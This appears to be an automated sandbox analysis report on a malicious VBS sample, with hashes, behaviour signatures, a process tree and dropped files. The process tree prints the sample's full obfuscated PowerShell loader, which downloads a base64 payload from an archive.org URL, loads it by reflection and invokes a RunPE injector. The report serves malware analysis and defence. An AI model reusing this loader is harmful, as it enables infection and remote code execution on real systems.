Analysis
max time kernel
227s
max time network
285s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
02-10-2024 03:28
Static task
static1
General
Target
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs
Size
504KB
MD5
73116ddf40456b41c6b35023bc02e781
SHA1
037b869900d0474bf7603b8fbe3401f517f52117
SHA256
6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a
SHA512
f60cbe6234371aacd3f42f87db8ea04cc3b982d9c356db5a1e0fa3959268c0aa8e78e4c059feac1619348a3453e55c3386e096812d2a4a6d61aca5cc99007be3
SSDEEP
12288:VS57Wp1MYi6qsGrA2OGLmeq0wM/l1d0FUvoExHRbb4XJb7q5cPT+EmJu6X:VC6X0T5VnpJ4Za
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
Blocklisted process makes network request 2 IoCs
flow  pid   Process
5     2108  powershell.exe
6     2108  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid   Process
1904  powershell.exe
2108  powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow  ioc
79    raw.githubusercontent.com
80    raw.githubusercontent.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry 2 TTPs 3 IoCs
description        ioc                                                                     Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   chrome.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid   Process
1904  powershell.exe
2108  powershell.exe
2200  chrome.exe
2200  chrome.exe
2200  chrome.exe
2200  chrome.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                 pid   Process
Token: SeDebugPrivilege     1904  powershell.exe
Token: SeDebugPrivilege     2108  powershell.exe
Token: SeShutdownPrivilege  2200  chrome.exe      (row repeated 62 times)
Suspicious use of FindShellTrayWindow 34 IoCs
pid   Process
2200  chrome.exe  (row repeated 34 times)
Suspicious use of SendNotifyMessage 32 IoCs
pid   Process
2200  chrome.exe  (row repeated 32 times)
Suspicious use of WriteProcessMemory 64 IoCs
description                       pid   Process         procid_target
PID 2288 wrote to memory of 1904  2288  WScript.exe     28  (row repeated 3 times)
PID 1904 wrote to memory of 2108  1904  powershell.exe  30  (row repeated 3 times)
PID 2200 wrote to memory of 2796  2200  chrome.exe      32  (row repeated 3 times)
PID 2200 wrote to memory of 2520  2200  chrome.exe      34  (row repeated 40 times)
PID 2200 wrote to memory of 2352  2200  chrome.exe      35  (row repeated 3 times)
PID 2200 wrote to memory of 2664  2200  chrome.exe      36  (row repeated 12 times)
Processes
C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs"
  PID: 2288
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsICcrJz0gJysneycrJzB9JysnaHR0cHMnKyc6Ly9pYTYnKycwMCcrJzEwMCcrJy51cy5hJysncmNoaXYnKydlLm9yZycrJy8yNC9pJysndGUnKydtcy9kZXRhaC0nKydubycrJ3RlLScrJ3YvRGV0YWhOb3RlJysnVicrJy50JysneCcrJ3R7MH07ezF9YmFzZScrJzYnKyc0Q29udGVuJysndCA9JysnIChOZScrJ3ctJysnT2InKydqJysnZScrJ2N0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQ2xpZW50KS5Eb3dubG9hZFN0cmluZyh7MScrJ311cmwpO3sxJysnfScrJ2InKydpbicrJ2FyeScrJ0NvbnRlbnQgPScrJyBbU3lzdCcrJ2UnKydtJysnLkNvbnZlcnRdJysnOjonKydGcm9tQicrJ2FzZTY0JysnU3QnKydyaW5nKCcrJ3sxJysnfWJhJysnc2U2NENvbicrJ3RlJysnbnQpOycrJ3sxJysnfWFzc2UnKydtYmx5ID0gW1JlZmxlY3QnKydpbycrJ24nKycuQScrJ3NzZW1ibHknKyddJysnOjpMb2FkKHsxfWJpbmFyeScrJ0MnKydvJysnbicrJ3QnKydlJysnbnQpO3sxfXR5JysncGUnKycgPScrJyB7MX1hJysnc3MnKydlJysnbWJseS5HJysnZXRUeXBlJysnKHswfVJ1blBFLicrJ0hvbWV7MH0pOycrJ3sxJysnfScrJ20nKydldGhvZCA9JysnIHsxfXR5cGUuRycrJ2V0JysnTWUnKyd0JysnaG9kKCcrJ3swfVZBSXsnKycwfScrJyk7ezF9bWV0aG9kLicrJ0ludicrJ29rJysnZSh7JysnMScrJ31udScrJ2xsLCBbbycrJ2JqZWMnKyd0JysnWycrJ11dJysnQCh7MH10eCcrJ3QueHR5bS92ZWQuJysnMicrJ3IuMzliMzQnKyc1MzAnKycyYScrJzA3JysnNWIxYmMwZDQnKyc1YjYzMmViOWVlNjInKyctYicrJ3UnKydwJysnLy86cycrJ3B0dCcrJ2h7MCcrJ30gLCcrJyAnKyd7MCcrJ31kZXNhdGl2YWRvezB9ICcrJywgezB9ZGVzYXQnKydpdmEnKydkb3snKycwJysnfScrJyAsIHswfWQnKydlc2F0JysnaScrJ3ZhJysnZG97MH0sezB9QScrJ2RkSScrJ25Qcm9jZScrJ3NzMycrJzJ7MH0sJysnezAnKyd9JysnezAnKyd9KScrJyknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzYpIHwgLiAoKEdWICcqbWRSKicpLm5hbWVbMywxMSwyXS1Kb2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    PID: 1904
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url '+'= '+'{'+'0}'+'https'+'://ia6'+'00'+'100'+'.us.a'+'rchiv'+'e.org'+'/24/i'+'te'+'ms/detah-'+'no'+'te-'+'v/DetahNote'+'V'+'.t'+'x'+'t{0};{1}base'+'6'+'4Conten'+'t ='+' (Ne'+'w-'+'Ob'+'j'+'e'+'ct System.N'+'e'+'t'+'.Web'+'Client).DownloadString({1'+'}url);{1'+'}'+'b'+'in'+'ary'+'Content ='+' [Syst'+'e'+'m'+'.Convert]'+'::'+'FromB'+'ase64'+'St'+'ring('+'{1'+'}ba'+'se64Con'+'te'+'nt);'+'{1'+'}asse'+'mbly = [Reflect'+'io'+'n'+'.A'+'ssembly'+']'+'::Load({1}binary'+'C'+'o'+'n'+'t'+'e'+'nt);{1}ty'+'pe'+' ='+' {1}a'+'ss'+'e'+'mbly.G'+'etType'+'({0}RunPE.'+'Home{0});'+'{1'+'}'+'m'+'ethod ='+' {1}type.G'+'et'+'Me'+'t'+'hod('+'{0}VAI{'+'0}'+');{1}method.'+'Inv'+'ok'+'e({'+'1'+'}nu'+'ll, [o'+'bjec'+'t'+'['+']]'+'@({0}tx'+'t.xtym/ved.'+'2'+'r.39b34'+'530'+'2a'+'07'+'5b1bc0d4'+'5b632eb9ee62'+'-b'+'u'+'p'+'//:s'+'ptt'+'h{0'+'} ,'+' '+'{0'+'}desativado{0} '+', {0}desat'+'iva'+'do{'+'0'+'}'+' , {0}d'+'esat'+'i'+'va'+'do{0},{0}A'+'ddI'+'nProce'+'ss3'+'2{0},'+'{0'+'}'+'{0'+'})'+')') -F [cHar]39,[cHar]36) | . ((GV '*mdR*').name[3,11,2]-Join'')"
      PID: 2108
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  PID: 2200
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef74b9758,0x7fef74b9768,0x7fef74b9778
    PID: 2796
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1164 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:2
    PID: 2520
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:8
    PID: 2352
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:8
    PID: 2664
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2288 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:1
    PID: 1628
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:1
    PID: 320
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1464 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:2
    PID: 2312
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1476 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:1
    PID: 2096
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3004 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:8
    PID: 2976
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:8
    PID: 576
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:8
    PID: 2476
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3800 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:1
    PID: 1700
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3452 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:1
    PID: 3060
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2144 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:1
    PID: 844
  C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=1384,i,13171802843557598301,12347262479734580876,131072 /prefetch:8
    PID: 1116
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
  PID: 2768
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 342B
MD5 5cf3afc836a9db89d6218fcb3c05bfb2
SHA1 54599e78d08b0d1bd816d7aa8c2ec442bf7f3090
SHA256 9f336c7e1854cdc6e8a171d84c4da30f3cd46757f1421f3300eda1cda231507e
SHA512 1ce3092a6244f33e6aec3f6918c311dab6cf7caa48e9a4dcbf1170dc0cfd9a3b6e8df69c31c08dca4b3d6a198da2e23406448732f4cb348bd62578eb979e6a75

Filesize 16B
MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Filesize 264KB
MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Filesize 3KB
MD5 a74be49c6e7e6a18f5a000c474ddab9a
SHA1 7fb53b35503a535cedf2aa6edda1a5feaddcbaf9
SHA256 8da46adfe7d428c1be3df656356eff86af8daa15d0bde559229e6ee9a412e171
SHA512 625f4f077b0b763a854916bb85ac9078ee8d0f3b4f13c5ca99db2b71952670bdcf82bd911a30cf14722b45eb5602cbf8429bb3cba98e83d105f74e7a8b193e17

Filesize 4KB
MD5 fed3b0f79b0d8d0db9e181fde83ebbec
SHA1 300b13b699a61031948eb00c92b0551c2fafede7
SHA256 b560367ee6ca71f846ebbc4daf08180404d3b8b61ddf9e2e2017219a032fddae
SHA512 d13ff4979d921397a53dcff3e5eafaad2456a6dbee00a8deeb0887da9679be6da0c512d52d4a17b2a48f976815c3d08705748a35ac07907cef24b7a02aaeb3f0

Filesize 527B
MD5 f3125af1a56af1a6c50ff8c33059036c
SHA1 b97b4c8b33e9ab5b88dbbab28d0025430fa105c6
SHA256 7d0b4c92396a04207f290ea225aa3169d3030862fc2b53be35a3a9683ff78e18
SHA512 e42bd79fd6b6f84017d60112090673d390ffa2de437245eb1aefc9977f3d07628f84c91b4bb047039a1cdf0c170de1a3d68d94e932e094a26eca5fcca18b01cb

Filesize 527B
MD5 3bdae73c71d63b72dc31822d171d4e93
SHA1 0eedc3bc914baf80f478064a26586173d0f36443
SHA256 48229d16c30d24abf5e26af1f21ce7773a4b949936d0fd90af5d62f101d96227
SHA512 dfeb7e4d71ccde2a9c998b0b3387954b912b4e7e1d5df623ef2c60dc728baaf0e0274f2ff88fb987dac8bc106593df2b784dc1eda5849c6631cfd4f971d5c817

Filesize 6KB
MD5 0b10adf6d9ae671934a002933af0ab5d
SHA1 3c21864d82c9a1e0d0ca7e84ffff60bbd6e5782d
SHA256 aee715287528d909035c1d82ef9cdf343e328d243967e6334162ae5d83e49558
SHA512 e7e7a899910169c121756a90c3cf23ba91f8297d586974efe3a18c413094c743263cae063e2a2a19651f64ff9e20f23d1e8eef81e9919a4da0c91975a3e9a8ef

Filesize 5KB
MD5 150b338682ae7b30bb2c7d85cb7ff1d8
SHA1 12cec805e6dbb790194d0eaf1801944ce931f945
SHA256 d6aa7d53d63a1a9cadab6b555b040794e95c54ca77d0d28436a6ce1e7e3b32c7
SHA512 4575f9c462becd3935651936a2191856f925e090376a60b595ac676ce269977a4b1eb82469bd9a15b1c4c21c56c4241364f9cb91bfa8bc66967e6bb37393e8d1

Filesize 16B
MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\da308f04-a095-45ce-aec7-f7a1dfe29fe9.tmp
Filesize 6KB
MD5 8e0f22d5a6dac801a070b77a4a9e662e
SHA1 732b41adb964373ce453d174291a48cbd36c25ec
SHA256 edef6faa0a4c407da6788bd90ed52e3ab8fbbe3cc9acd5a875be4402d2eeca7e
SHA512 92edaa85e019e46cccb4df53276c87f4db7e918843588f0f961d5f6645567b9a3e20b8591a5ef7997d3cff5ebff0caeece8402ad6d1b6bf13f7ed59a22ba7b6f

Filesize 70KB
MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Filesize 181KB
MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 8d94ff05ada3159d426d97c4d36107c4
SHA1 233f9cb0766ea11dd049be69c9e1f2092eb51108
SHA256 cfa6b34a80ae9fc431ba0b2a969648e78b7462b451f5b6c046d4374e39349a39
SHA512 e1ca20b0e4513abe6a47625778bb8869bb776d7c96e826cc1a32394897ed23132f1628ad5b4b85f5f96224da42844a456629327525efe5a0a09d9e188e6062b7